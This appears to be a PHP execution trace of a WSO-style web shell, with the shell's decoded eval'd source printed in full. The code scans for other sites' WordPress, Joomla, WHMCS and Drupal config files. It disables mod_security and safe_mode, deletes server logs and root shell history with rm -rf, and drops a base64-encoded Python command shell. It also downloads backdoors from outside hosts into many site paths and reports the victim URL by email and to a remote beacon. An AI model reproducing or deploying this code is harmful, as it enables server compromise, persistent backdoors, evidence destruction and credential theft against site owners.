$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso.php(4) : eval()'d code	1	0
4	13	0	0.007940	1143752	base64_decode	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.007962	1143840
4	13	R			'http://byr00t.co/l-'
4	14	0	0.007980	1143808	GetIP	1		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.007994	1143808	getenv	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.008013	1143840
5	15	R			FALSE
5	16	0	0.008028	1143808	getenv	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008044	1143840
5	16	R			FALSE
5	17	0	0.008058	1143808	getenv	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008073	1143880
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008101	1143848
4	14	R			'127.0.0.1'
4	18	0	0.008116	1143872	base64_encode	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso.php'
4	18	1	0.008131	1143984
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4	19	0	0.008165	1143864	function_exists	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008179	1143904
